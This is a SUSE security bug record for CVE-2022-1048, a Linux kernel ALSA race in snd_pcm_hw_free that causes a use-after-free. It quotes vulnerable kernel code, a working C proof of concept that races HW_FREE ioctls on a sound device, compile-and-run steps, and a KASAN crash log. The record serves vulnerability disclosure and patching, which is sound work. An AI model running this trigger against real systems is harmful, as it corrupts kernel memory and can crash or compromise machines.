Bug 1197331 (CVE-2022-1048)

Summary:	VUL-0: CVE-2022-1048: kernel-source: Race Condition in snd_pcm_hw_free leading to use-after-free
Product:	[Novell Products] SUSE Security Incidents	Reporter:	Gianluca Gabrielli <gianluca.gabrielli>
Component:	Incidents	Assignee:	Security Team bot <security-team>
Status:	RESOLVED FIXED	QA Contact:	Security Team bot <security-team>
Severity:	Normal
Priority:	P3 - Medium	CC:	gabriele.sonnu, meissner, tiwai
Version:	unspecified
Target Milestone:	---
Hardware:	Other
OS:	Other
URL:	https://smash.suse.de/issue/326830/
Whiteboard:	CVSSv3.1:SUSE:CVE-2022-1048:7.4:(AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
Found By:	---	Services Priority:
Business Priority:		Blocker:	---
Marketing QA Status:	---	IT Deployment:	---
Bug Depends on:
Bug Blocks:	1197597

Description Gianluca Gabrielli 2022-03-21 08:33:58 UTC

From private linux-distros ML
-----------------------------

# Linux Kernel: Race Condition in snd_pcm_hw_free leading to use-after-free
## Details
In the path: snd_pcm_common_ioctl -> snd_pcm_hw_free:
```c
static int snd_pcm_hw_free(struct snd_pcm_substream *substream)
{
	struct snd_pcm_runtime *runtime;
	int result;

	if (PCM_RUNTIME_CHECK(substream))
		return -ENXIO;
	runtime = substream->runtime;
	snd_pcm_stream_lock_irq(substream);
	switch (runtime->status->state) {
	case SNDRV_PCM_STATE_SETUP:
	case SNDRV_PCM_STATE_PREPARED:
		break;
	default:
		snd_pcm_stream_unlock_irq(substream);
		return -EBADFD;
	}
	snd_pcm_stream_unlock_irq(substream);
	if (atomic_read(&substream->mmap_count))
		return -EBADFD;
	result = do_hw_free(substream);
	snd_pcm_set_state(substream, SNDRV_PCM_STATE_OPEN);
	cpu_latency_qos_remove_request(&substream->latency_pm_qos_req);
	return result;
}
```
It seems like that the function call the unlock too early, this may lead to a race condition in the following code. 
And if two threads call do_hw_free->snd_pcm_lib_free_pages at the same time:
```
int snd_pcm_lib_free_pages(struct snd_pcm_substream *substream)
{
	struct snd_card *card = substream->pcm->card;
	struct snd_pcm_runtime *runtime;

	if (PCM_RUNTIME_CHECK(substream))
		return -EINVAL;
	runtime = substream->runtime;
	if (runtime->dma_area == NULL)
		return 0;
	if (runtime->dma_buffer_p != &substream->dma_buffer) {    //  ******** 1 ********
		/* it's a newly allocated buffer.  release it now. */
		do_free_pages(card, runtime->dma_buffer_p);
		kfree(runtime->dma_buffer_p);      //  ******** 2 ********
	}
	snd_pcm_set_runtime_buffer(substream, NULL);
	return 0;
}
```
=> It will lead to a use-after-free(double free) issue in the kernel.

## Suggestion

Add a lock to the snd_pcm_lib_free_pages and unlock it when return.

## Reporter

Kirin(@Pwnrin) of Tencent Security Xuanwu Lab

## POC

To trigger this vulnerability at (2), the poc should bypass the check in snd_pcm_lib_free_pages:(1). Actually, whether to apply for new memory here is related to the sound driver used in the system.
If we add a virtual machine in VirtualBox with Ubuntu. The default sound driver is intel8x0, and in this driver we can alloc a new buffer and bypass the check in (1) easily.
(But in the Vmware, the driver has requested the maximum memory size in advance. To trigger the vulnerability, we must write the "/proc/xxx/xxx/prealloc" file in sound card to force the driver to apply for a smaller buffer(in function snd_pcm_lib_preallocate_proc_write) so that we can alloc a new buffer in snd_pcm_lib_malloc_pages later.)
**The POC:**
```
#include <stdio.h>
#include <stdlib.h>
#include "alsa/asoundlib.h"
#include <stdbool.h>
#include <sys/socket.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <stdio.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
typedef unsigned int __u32;
#define	SNDRV_PCM_HW_PARAM_ACCESS	0	/* Access type */
#define	SNDRV_PCM_HW_PARAM_FORMAT	1	/* Format */
#define	SNDRV_PCM_HW_PARAM_SUBFORMAT	2	/* Subformat */
#define	SNDRV_PCM_HW_PARAM_FIRST_MASK	SNDRV_PCM_HW_PARAM_ACCESS
#define	SNDRV_PCM_HW_PARAM_LAST_MASK	SNDRV_PCM_HW_PARAM_SUBFORMAT

#define	SNDRV_PCM_HW_PARAM_SAMPLE_BITS	8	/* Bits per sample */
#define	SNDRV_PCM_HW_PARAM_FRAME_BITS	9	/* Bits per frame */
#define	SNDRV_PCM_HW_PARAM_CHANNELS	10	/* Channels */
#define	SNDRV_PCM_HW_PARAM_RATE		11	/* Approx rate */
#define	SNDRV_PCM_HW_PARAM_PERIOD_TIME	12	/* Approx distance between
						 * interrupts in us
						 */
#define	SNDRV_PCM_HW_PARAM_PERIOD_SIZE	13	/* Approx frames between
						 * interrupts
						 */
#define	SNDRV_PCM_HW_PARAM_PERIOD_BYTES	14	/* Approx bytes between
						 * interrupts
						 */
#define	SNDRV_PCM_HW_PARAM_PERIODS	15	/* Approx interrupts per
						 * buffer
						 */
#define	SNDRV_PCM_HW_PARAM_BUFFER_TIME	16	/* Approx duration of buffer
						 * in us
						 */
#define	SNDRV_PCM_HW_PARAM_BUFFER_SIZE	17	/* Size of buffer in frames */
#define	SNDRV_PCM_HW_PARAM_BUFFER_BYTES	18	/* Size of buffer in bytes */
#define	SNDRV_PCM_HW_PARAM_TICK_TIME	19	/* Approx tick duration in us */
#define	SNDRV_PCM_HW_PARAM_FIRST_INTERVAL	SNDRV_PCM_HW_PARAM_SAMPLE_BITS
#define	SNDRV_PCM_HW_PARAM_LAST_INTERVAL	SNDRV_PCM_HW_PARAM_TICK_TIME

struct snd_interval {
	unsigned int min, max;
	unsigned int openmin:1,
		     openmax:1,
		     integer:1,
		     empty:1;
};

#define SNDRV_MASK_MAX	256

struct snd_mask {
	__u32 bits[(SNDRV_MASK_MAX+31)/32];
};

typedef struct {
	int version;
	int fd;
	int card, device, subdevice;

	volatile struct snd_pcm_mmap_status * mmap_status;
	struct snd_pcm_mmap_control *mmap_control;
	bool mmap_status_fallbacked;
	bool mmap_control_fallbacked;
	struct snd_pcm_sync_ptr *sync_ptr;

	int period_event;
	snd_timer_t *period_timer;
	struct pollfd period_timer_pfd;
	int period_timer_need_poll;
	/* restricted parameters */
	snd_pcm_format_t format;
	int rate;
	int channels;
	/* for chmap */
	unsigned int chmap_caps;
	snd_pcm_chmap_query_t **chmap_override;
} snd_pcm_hw_t;

struct snd_pcm_hw_params {
	unsigned int flags;
	struct snd_mask masks[SNDRV_PCM_HW_PARAM_LAST_MASK -
			       SNDRV_PCM_HW_PARAM_FIRST_MASK + 1];
	struct snd_mask mres[5];	/* reserved masks */
	struct snd_interval intervals[SNDRV_PCM_HW_PARAM_LAST_INTERVAL -
				        SNDRV_PCM_HW_PARAM_FIRST_INTERVAL + 1];
	struct snd_interval ires[9];	/* reserved intervals */
	unsigned int rmask;		/* W: requested masks */
	unsigned int cmask;		/* R: changed masks */
	unsigned int info;		/* R: Info flags for returned setup */
	unsigned int msbits;		/* R: used most significant bits */
	unsigned int rate_num;		/* R: rate numerator */
	unsigned int rate_den;		/* R: rate denominator */
	snd_pcm_uframes_t fifo_size;	/* R: chip FIFO size in frames */
	unsigned char reserved[64];	/* reserved for future */
};
int k;
int magic_fd;
unsigned char hw_params_data[] =
{
  0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x04, 0x00, 
  0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 
  0x04, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 
  0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x40, 0x1F, 0x00, 0x00, 
  0x80, 0xBB, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0x35, 
  0x05, 0x00, 0x00, 0x40, 0x1F, 0x00, 0x01, 0x00, 0x00, 0x00, 
  0x00, 0x48, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x04, 0x00, 
  0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0x20, 0x01, 0x00, 
  0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 
  0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x55, 0x35, 0x05, 0x00, 
  0x00, 0x40, 0x1F, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x48, 
  0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 
  0x00, 0x20, 0x01, 0x00, 0x00, 0x20, 0x01, 0x00, 0x04, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xFF, 0x07, 0x00, 
  0x03, 0x01, 0x0D, 0x80, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
void race(){
  while(k!=1){};
  ioctl(magic_fd,0x4112,0);
}
int main(int argc, char *argv[])
{
  int i; 
  int j; 
  int fd; 
  snd_pcm_hw_params_t *ptr; 
  snd_pcm_hw_params_malloc(&ptr);
  memcpy(ptr, hw_params_data, 0x260);
  magic_fd = open("/dev/snd/pcmC0D1c", 0);
  printf("[+] CHECK FD: %d\n",magic_fd);
  ioctl(magic_fd, 0xC2604111, ptr);
#define RACE_NUM 20
  pthread_t race_thread[RACE_NUM]={};
  for(int i=0;i<RACE_NUM;i++){
      pthread_create(&race_thread[i],NULL,race,NULL);
  }
  k=1;
  for(int i=0;i<RACE_NUM;i++){
      pthread_join(race_thread[i],NULL);
  }
  return 0;
}
```
To trigger it easily, please run it in VirtualBox with Ubuntu(with latest stable kernel version), and make sure the user has permission to open "/dev/snd/pcmC0D1c"(in user group: audio) :
```
sudo apt-get install libasound2-dev
gcc exp.c -lasound -lpthread -ldl -lm -o poc
./poc  # I lost a stable version of POC, you may need to run the poc(above) several times to see a kasan log of use-after-free.
```

## KASAN LOG 
```
[  141.594199] BUG: Bad page state in process exp  pfn:79140
[  141.594201] ==================================================================
[  141.594213] BUG: KASAN: use-after-free in snd_dma_free_pages+0x2cd/0x380 [snd_pcm]
[  141.594217] Read of size 4 at addr ffff8880b34c9400 by task exp/1956

[  141.594224] CPU: 1 PID: 1956 Comm: exp Not tainted 5.4.166 #1
[  141.594226] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[  141.594228] page:ffffea0001e45000 refcount:-1 mapcount:0 mapping:0000000000000000 index:0x0 compound_mapcount: 0
[  141.594231] flags: 0xfffffc0010000(head)
[  141.594232] Call Trace:
[  141.594253]  dump_stack+0x96/0xc7
[  141.594255] raw: 000fffffc0010000 dead000000000100 dead000000000122 0000000000000000
[  141.594264]  print_address_description.constprop.0+0x20/0x210
[  141.594265] raw: 0000000000000000 0000000000000000 ffffffffffffffff 0000000000000000
[  141.594266] page dumped because: nonzero _refcount
[  141.594272]  ? snd_dma_free_pages+0x2cd/0x380 [snd_pcm]
[  141.594275]  __kasan_report.cold+0x37/0x77
[  141.594276] Modules linked in: nls_iso8859_1
[  141.594283]  ? snd_dma_free_pages+0x2cd/0x380 [snd_pcm]
[  141.594284]  intel_rapl_msr snd_intel8x0 snd_ac97_codec ac97_bus
[  141.594289]  kasan_report+0x14/0x20
[  141.594289]  snd_pcm snd_seq_midi
[  141.594293]  __asan_report_load4_noabort+0x14/0x20
[  141.594294]  snd_seq_midi_event snd_rawmidi
[  141.594300]  snd_dma_free_pages+0x2cd/0x380 [snd_pcm]
[  141.594300]  snd_seq intel_rapl_common crct10dif_pclmul
[  141.594308]  snd_pcm_lib_free_pages+0xc6/0x250 [snd_pcm]
[  141.594308]  ghash_clmulni_intel snd_seq_device joydev
[  141.594314]  snd_intel8x0_hw_free+0x98/0x170 [snd_intel8x0]
[  141.594314]  cryptd snd_timer rapl
[  141.594321]  snd_pcm_common_ioctl+0x5d5/0x1b00 [snd_pcm]
[  141.594322]  input_leds serio_raw snd vboxguest
[  141.594329]  ? snd_pcm_status_user+0x130/0x130 [snd_pcm]
[  141.594330]  soundcore mac_hid sch_fq_codel vmwgfx ttm
[  141.594338]  snd_pcm_ioctl+0x6d/0xb0 [snd_pcm]
[  141.594339]  drm_kms_helper fb_sys_fops syscopyarea
[  141.594344]  do_vfs_ioctl+0x9da/0x1020
[  141.594345]  sysfillrect sysimgblt drm
[  141.594349]  ? ioctl_preallocate+0x1c0/0x1c0
[  141.594349]  parport_pc ppdev
[  141.594353]  ? __kasan_check_write+0x14/0x20
[  141.594353]  lp parport ip_tables
[  141.594357]  ? __fget+0x21c/0x3d0
[  141.594358]  x_tables autofs4 hid_generic
[  141.594362]  ? copy_fd_bitmaps+0x2e0/0x2e0
[  141.594363]  usbhid hid psmouse
[  141.594366]  ? __switch_to_asm+0x40/0x70
[  141.594367]  crc32_pclmul ahci
[  141.594369]  ? __switch_to_asm+0x34/0x70
[  141.594370]  libahci e1000
[  141.594373]  ? __switch_to_asm+0x40/0x70
[  141.594373]  i2c_piix4 pata_acpi
[  141.594376]  ? __switch_to_asm+0x34/0x70
[  141.594376]  video
[  141.594381]  ? __fget_light+0x17e/0x1f0
[  141.594384]  ksys_ioctl+0x67/0x90
[  141.594387]  __x64_sys_ioctl+0x73/0xb0
[  141.594391]  ? fpregs_assert_state_consistent+0x22/0xa0
[  141.594395]  do_syscall_64+0x9f/0x3c0
[  141.594398]  ? syscall_return_slowpath+0x1a5/0x220
[  141.594402]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  141.594404] RIP: 0033:0x4e68b7
[  141.594409] Code: 4f 55 04 00 85 c0 78 df 48 83 c4 08 48 89 d8 5b 5d c3 90 48 89 e8 48 f7 d8 48 39 c3 0f 92 c0 eb b4 66 90 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
[  141.594410] RSP: 002b:00007fab6baaada8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[  141.594414] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00000000004e68b7
[  141.594415] RDX: 0000000000000000 RSI: 0000000000004112 RDI: 0000000000000003
[  141.594417] RBP: 00007fab6baaadb0 R08: 00007fab6baab700 R09: 00007fab6baab700
[  141.594419] R10: 00007fab6baab9d0 R11: 0000000000000246 R12: 00007fab6baaae80
[  141.594421] R13: 0000000000000000 R14: 0000000000000000 R15: 00007ffe52234d70

[  141.594427] CPU: 2 PID: 1948 Comm: exp Not tainted 5.4.166 #1
[  141.594429] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[  141.594430] Call Trace:
[  141.594431] Allocated by task 1946:
[  141.594435]  save_stack+0x23/0x90
[  141.594438]  __kasan_kmalloc.constprop.0+0xcf/0xe0
[  141.594441]  dump_stack+0x96/0xc7
[  141.594443]  kasan_kmalloc+0x9/0x10
[  141.594445]  bad_page.cold+0xfb/0x120
[  141.594448]  kmem_cache_alloc_trace+0x113/0x290
[  141.594450]  ? si_mem_available+0x310/0x310
[  141.594456]  snd_pcm_lib_malloc_pages+0x2bd/0x680 [snd_pcm]
[  141.594458]  ? __kasan_check_write+0x14/0x20
[  141.594461]  snd_intel8x0_hw_params+0x10d/0x550 [snd_intel8x0]
[  141.594464]  ? mutex_lock+0x8f/0xe0
[  141.594469]  snd_pcm_hw_params+0x2c6/0x1250 [snd_pcm]
[  141.594471]  free_pages_check_bad+0x147/0x1b0
[  141.594477]  snd_pcm_common_ioctl+0x362/0x1b00 [snd_pcm]
[  141.594479]  __free_pages_ok+0x80d/0xa60
[  141.594485]  snd_pcm_ioctl+0x6d/0xb0 [snd_pcm]
[  141.594488]  __free_pages+0x47/0x50
[  141.594491]  do_vfs_ioctl+0x9da/0x1020
[  141.594505]  dma_direct_free_pages+0xc7/0x150
[  141.594507]  ksys_ioctl+0x67/0x90
[  141.594510]  dma_direct_free+0xe/0x10
[  141.594512]  __x64_sys_ioctl+0x73/0xb0
[  141.594514]  dma_free_attrs+0x61/0x150
[  141.594517]  do_syscall_64+0x9f/0x3c0
[  141.594524]  ? snd_ac97_pcm_close+0x2d3/0x5a0 [snd_ac97_codec]
[  141.594527]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  141.594532]  snd_dma_free_pages+0x16b/0x380 [snd_pcm]

[  141.594540]  snd_pcm_lib_free_pages+0xc6/0x250 [snd_pcm]
[  141.594542] Freed by task 1947:
[  141.594545]  snd_intel8x0_hw_free+0x11e/0x170 [snd_intel8x0]
[  141.594552]  snd_pcm_common_ioctl+0x5d5/0x1b00 [snd_pcm]
[  141.594555]  save_stack+0x23/0x90
[  141.594560]  ? snd_pcm_status_user+0x130/0x130 [snd_pcm]
[  141.594563]  __kasan_slab_free+0x137/0x180
[  141.594568]  snd_pcm_ioctl+0x6d/0xb0 [snd_pcm]
[  141.594570]  kasan_slab_free+0xe/0x10
[  141.594573]  do_vfs_ioctl+0x9da/0x1020
[  141.594575]  kfree+0x98/0x270
[  141.594577]  ? ioctl_preallocate+0x1c0/0x1c0
[  141.594582]  snd_pcm_lib_free_pages+0xed/0x250 [snd_pcm]
[  141.594585]  ? __kasan_check_write+0x14/0x20
[  141.594588]  snd_intel8x0_hw_free+0x11e/0x170 [snd_intel8x0]
[  141.594590]  ? __fget+0x21c/0x3d0
[  141.594596]  snd_pcm_common_ioctl+0x5d5/0x1b00 [snd_pcm]
[  141.594598]  ? copy_fd_bitmaps+0x2e0/0x2e0
[  141.594603]  snd_pcm_ioctl+0x6d/0xb0 [snd_pcm]
[  141.594605]  ? __switch_to_asm+0x40/0x70
[  141.594607]  ? __switch_to_asm+0x34/0x70
[  141.594609]  do_vfs_ioctl+0x9da/0x1020
[  141.594611]  ksys_ioctl+0x67/0x90
[  141.594613]  ? __switch_to_asm+0x40/0x70
[  141.594614]  __x64_sys_ioctl+0x73/0xb0
[  141.594617]  do_syscall_64+0x9f/0x3c0
[  141.594619]  ? __switch_to_asm+0x34/0x70
[  141.594621]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  141.594624]  ? __fget_light+0x17e/0x1f0

[  141.594627]  ksys_ioctl+0x67/0x90
[  141.594630]  __x64_sys_ioctl+0x73/0xb0
[  141.594633]  ? fpregs_assert_state_consistent+0x22/0xa0
[  141.594635] The buggy address belongs to the object at ffff8880b34c9400
                which belongs to the cache kmalloc-64 of size 64
[  141.594639] The buggy address is located 0 bytes inside of
                64-byte region [ffff8880b34c9400, ffff8880b34c9440)
[  141.594641] The buggy address belongs to the page:
[  141.594644] page:ffffea0002cd3240 refcount:1 mapcount:0 mapping:ffff8880c5403600 index:0x0
[  141.594646] flags: 0xfffffc0000200(slab)
[  141.594649]  do_syscall_64+0x9f/0x3c0
[  141.594652]  ? syscall_return_slowpath+0x1a5/0x220
[  141.594653] raw: 000fffffc0000200 ffffea0001e253c0 0000000c0000000c ffff8880c5403600
[  141.594657]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  141.594658] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000
[  141.594659] page dumped because: kasan: bad access detected
[  141.594661] RIP: 0033:0x4e68b7

[  141.594664] Code: 4f 55 04 00 85 c0 78 df 48 83 c4 08 48 89 d8 5b 5d c3 90 48 89 e8 48 f7 d8 48 39 c3 0f 92 c0 eb b4 66 90 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
[  141.594666] RSP: 002b:00007fab6fab2da8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[  141.594668] Memory state around the buggy address:
[  141.594670] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00000000004e68b7
[  141.594672] RDX: 0000000000000000 RSI: 0000000000004112 RDI: 0000000000000003
[  141.594674] RBP: 00007fab6fab2db0 R08: 00007fab6fab3700 R09: 00007fab6fab3700
[  141.594675]  ffff8880b34c9300: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[  141.594678]  ffff8880b34c9380: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[  141.594680] >ffff8880b34c9400: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[  141.594682]                    ^
[  141.594684]  ffff8880b34c9480: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[  141.594686]  ffff8880b34c9500: 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc
[  141.594688] ==================================================================
[  141.594690] Disabling lock debugging due to kernel taint
[  141.594692] R10: 00007fab6fab39d0 R11: 0000000000000246 R12: 00007fab6fab2e80
[  141.594693] R13: 0000000000000000 R14: 0000000000000000 R15: 00007ffe52234d70
[  141.594699] ------------[ cut here ]------------
[  141.594700] pm_qos_remove_request() called for unknown object
[  141.594706] snd-malloc: invalid device type 0
[  141.594709] ------------[ cut here ]------------
[  141.594710] pm_qos_remove_request() called for unknown object
[  141.594716] WARNING: CPU: 2 PID: 1948 at kernel/power/qos.c:477 pm_qos_remove_request+0x204/0x2c0
[  141.594719] WARNING: CPU: 1 PID: 1956 at kernel/power/qos.c:477 pm_qos_remove_request+0x204/0x2c0
[  141.594720] Modules linked in:
[  141.594721] Modules linked in:
[  141.594721]  nls_iso8859_1 intel_rapl_msr
[  141.594723]  nls_iso8859_1
[  141.594724]  snd_intel8x0 snd_ac97_codec
[  141.594726]  intel_rapl_msr
[  141.594727]  ac97_bus snd_pcm
[  141.594728]  snd_intel8x0
[  141.594729]  snd_seq_midi
[  141.594730]  snd_ac97_codec
[  141.594731]  snd_seq_midi_event
[  141.594732]  ac97_bus
[  141.594733]  snd_rawmidi snd_seq
[  141.594735]  snd_pcm
[  141.594736]  intel_rapl_common
[  141.594737]  snd_seq_midi
[  141.594738]  crct10dif_pclmul ghash_clmulni_intel
[  141.594740]  snd_seq_midi_event
[  141.594740]  snd_seq_device joydev
[  141.594742]  snd_rawmidi
[  141.594743]  cryptd
[  141.594744]  snd_seq
[  141.594745]  snd_timer rapl
[  141.594747]  intel_rapl_common
[  141.594748]  input_leds serio_raw
[  141.594749]  crct10dif_pclmul
[  141.594750]  snd vboxguest
[  141.594752]  ghash_clmulni_intel
[  141.594753]  soundcore
[  141.594754]  snd_seq_device
[  141.594755]  mac_hid sch_fq_codel
[  141.594756]  joydev
[  141.594757]  vmwgfx
[  141.594758]  cryptd
[  141.594759]  ttm drm_kms_helper
[  141.594761]  snd_timer
[  141.594762]  fb_sys_fops syscopyarea
[  141.594763]  rapl
[  141.594764]  sysfillrect sysimgblt
[  141.594766]  input_leds
[  141.594767]  drm parport_pc
[  141.594768]  serio_raw
[  141.594769]  ppdev
[  141.594770]  snd
[  141.594771]  lp parport
[  141.594773]  vboxguest
[  141.594774]  ip_tables x_tables
[  141.594775]  soundcore
[  141.594776]  autofs4 hid_generic
[  141.594778]  mac_hid
[  141.594779]  usbhid hid
[  141.594780]  sch_fq_codel
[  141.594781]  psmouse crc32_pclmul
[  141.594783]  vmwgfx
[  141.594784]  ahci libahci
[  141.594785]  ttm
[  141.594786]  e1000 i2c_piix4
[  141.594788]  drm_kms_helper
[  141.594818]  pata_acpi video
[  141.594821]  fb_sys_fops
[  141.594823]  syscopyarea sysfillrect
[  141.594826] CPU: 1 PID: 1956 Comm: exp Tainted: G    B             5.4.166 #1
[  141.594827]  sysimgblt drm parport_pc
[  141.594830] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[  141.594830]  ppdev lp parport
[  141.594835] RIP: 0010:pm_qos_remove_request+0x204/0x2c0
[  141.594836]  ip_tables x_tables autofs4
[  141.594839] Code: 48 c1 ea 03 0f b6 04 02 84 c0 74 08 3c 03 0f 8e 9c 00 00 00 4d 63 6c 24 28 e9 8d fe ff ff 48 c7 c7 e0 44 4d ba e8 7f 10 f1 01 <0f> 0b 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 b8 00 00 00 00 00 fc ff
[  141.594840]  hid_generic usbhid hid
[  141.594843] RSP: 0018:ffff8880b366fbb8 EFLAGS: 00010282
[  141.594844]  psmouse crc32_pclmul
[  141.594846]  ahci libahci e1000
[  141.594849] RAX: 0000000000000000 RBX: ffffffffc0b416e0 RCX: 0000000000000000
[  141.594849]  i2c_piix4 pata_acpi video
[  141.594852] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffffed10166cdf69
[  141.594854] RBP: ffff8880b366fbe0 R08: 0000000000000001 R09: ffffed10193d551b
[  141.594857] CPU: 2 PID: 1948 Comm: exp Tainted: G    B             5.4.166 #1
[  141.594858] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[  141.594859] R10: ffffed10193d551a R11: ffff8880c9eaa8d7 R12: ffff888035191440
